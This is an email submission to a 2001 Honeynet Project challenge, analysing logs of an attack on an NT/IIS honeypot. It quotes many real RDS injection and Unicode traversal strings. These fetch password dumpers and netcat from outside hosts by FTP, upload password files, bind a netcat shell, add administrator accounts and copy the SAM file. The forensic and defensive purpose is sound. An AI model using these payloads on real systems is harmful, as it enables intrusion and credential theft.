From alterego@in-box.net Fri Apr 20 20:29:32 2001 Date: Wed, 4 Apr 2001 06:55:27 -0400 From: alterego@in-box.net To: project@honeynet.org Subject: Scan of the Month - April This is my first look at a log of an NT system and my windows experience is woefully limited to playing games. Assumptions: the events in the log is sequential in order from top to bottom. a) Which exploit(s) were used to attack the system? It looked like the MSADC/RDS exploit script by rain forest puppy based on the ADM signature and the request headers. Also the unicode exploit was used to create a netcat download and shell script. b) How were the exploits used to access and control the system? The MSADC/RDS makes use of the RDS vulnerability in IIS allowing remote queries via RDS and embeding NT command line commands inside those queries. No active database and UserIDs are needed as a connection is made to a database installed by default in Option pack 4, the %systemroot%\help\iis\htm\tutorial\btcustmr.mdb. Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo user johna2k > ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;  Select * from Customers where City='|shell("cmd /c echo hacker2000 >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get samdump.dll >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get pdump.exe >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get nc.exe >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo quit >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c ftp -s:ftpcom -n www.nether.net")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c pdump.exe >> new.pass")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo user johna2k > ftpcom2")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo hacker2000 >> ftpcom2")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c put new.pass >> ftpcom2")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo quit >> ftpcom2")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c ftp -s:ftpcom2 -n www.nether.net")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c ftp 213.116.251.162")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo open 213.116.251.162 > ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo johna2k > ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo hacker2000 >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get samdump.dll >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get pdump.exe >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get nc.exe >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo quit >> ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c ftp -s:ftpcom")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c open 212.139.12.26")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo johna2k >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo haxedj00 >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get pdump.exe >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get samdump.dll >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get nc.exe >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo quit >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c ftp -s:sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c open 213.116.251.162")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo johna2k >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo haxedj00 >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get pdump.exe >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get samdump.dll >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo get nc.exe >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c echo quit >>sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c ftp -s:sasfile")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; For some reason, it was not able to start the ftp. Perhaps due to the space between >> and the filename? The unicode exploit works by using unicode %c0%af in place of '/' to perform directory traversals, e.g. "/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0." GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\wi nnt\system32\cmd.exe+cmd1.exe HTTP/1.1 GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/syste m/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1 . . . GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/syste m/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1 This works and a netcat executable was ftp over and binded to port 6969, i.e. GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/syste m/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe c) What was done once access was gained? Short version Basically get passwords, system information, administrators rights, configuration data and exploring the system for interesting stuff for retrieving. Long version He tried 1) pdump.exe >> c:\yay.txt to get passwords 2) net session >>yay2.txt and yay3.txt to get sessions 3) net users >>heh.txt to get user lists 4) typed a message to the admin in README.NOW.HAXOR to patch the holes. Somewhere in between he enters a exploits directory, with microsoft, newfiles and unix directories. 5) Tried to escalate priviledges by using RDS commands Select * from Customers where City='|shell("cmd /c net localgroup Domain Admins IWAM_KENNY /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c net localgroup Domain Admins IUSR_KENNY /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c net localgroup administrators IUSR_KENNY /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c net localgroup administrators IWAM_KENNY /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c net user testuser UgotHacked /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Select * from Customers where City='|shell("cmd /c net localgroup Administrators testuser /ADD")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; After playing around with the net commands, he decided to delete the exploit files and password dumper. Next he ran rdisk -s to save his changes to the rescue disk configuration. >From what I can make out from the mess, there are a few denied access. 6) After that he used RDS to execute his commands. Select * from Customers where City='|shell("cmd /c rdisk -s")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; In fact he tried it a few times , varying the positions of the '-', '/' and 's', between dir commands, maybe because the commands not changing any of the date stamps. It finally changed when he tried rdisk /s- 7) Tried to make a copy of the sam file. Select * from Customers where City='|shell("cmd /c type c:\winnt\repair\sam._ >>c:\har.txt")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Did a dir and bingo, har.txt. 8) type a few commands that was not successful but I cant make out what it was. Did see exit somewhere followed by an unicode exploit to start netcat again. 9) Later he starts another netcat session at port 6968. He tries a net session but fails. Later he tries to access a shared file, and failing that enters a directory wiretrip with nasty weapons like msadc1.pl and msadc2.pl, and some evil sounding DoS source code like RFParalyze.c and RFPoison.c. There is also archives of the whisker web scanner. 10) Next he visits a few directories, incluing inetpub and the wwwroot inside it. Is that Rain forest puppy's page in there? He copies the har.txt file he created there and tries to get it. He tries to del it after that. Doesn't seem to work as it appears the next time he dir. After trying a few times, he gives up and uses RDS to do it. Select * from Customers where City='|shell("cmd /c del c:\inetpub\wwwroot\har.txt")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Poor guy, he can't seem to get rid of it. 11) Enters the guest directory. Tries to map out the possible partitions and disks by doing dir from d: onwards. At least it looked that way. Did a listing of the c:\temp directory 12) runs nc at port 6968 again using unicode.Takes a look around and checked yay.txt. Later he creates a new directory called test. Goes digging in the exploits directories. Looks like a script kiddies's armoury there. Types a message to the admin telling him thats the best honeypot he had seen so far. Probably due to lack of user activities. 13) After a few failed attempts to retieve his readme, he explores the exploits directory and its contents. Seemed to be interested in some of the contents, for example a dns scanner and a irc sequencer. Does quite a bit of exploring again of the drive layout. Hmm, the pages retrieved seems to indicate that this is Rain Forest Puppies home page? 14) Tries another RDS Select * from Customers where City='|shell("cmd /c net user IWAM_KENNY Snake69Snake69")|driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; Must have realized something horrfying as he types 'This can't be true' into a text file int the wwwroot directory and retrieves it. Deletes the test directory he created in the root directory. 15) Echoes something into the default.htm. 16) Hmmm, a new attempt to copy the cmd file. Fails because the process is running. Uses the unicode exploit to craft a ftp script to put the whiskers.tar.gz to his server. Binds a nc to port 6969. 17) cleans up by sending a unicode to del the ftpcom script file. 18) Read the guest books. Okay, it is RFP's web page. d) How could this attack been prevented? Basically, those who don't need RDS would need to upgrade MDAC, run HANDSAFE.EXE for setting the registry and safe handlers and prevent people from using RDS remotely by removing the /msadc/ virtual root. Those who do can upgrade the MDAC, use custom handlers and delete the VbBusObj references from the registry. For the unicode exploit, patches are available from Microsoft. e) How much time did you spend on this analysis and writeup? 1 Day. Bonus Question: Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not? Yes. He left a text file complimenting the honeypot. Probably due to lack of user activities or he read the guest book ;)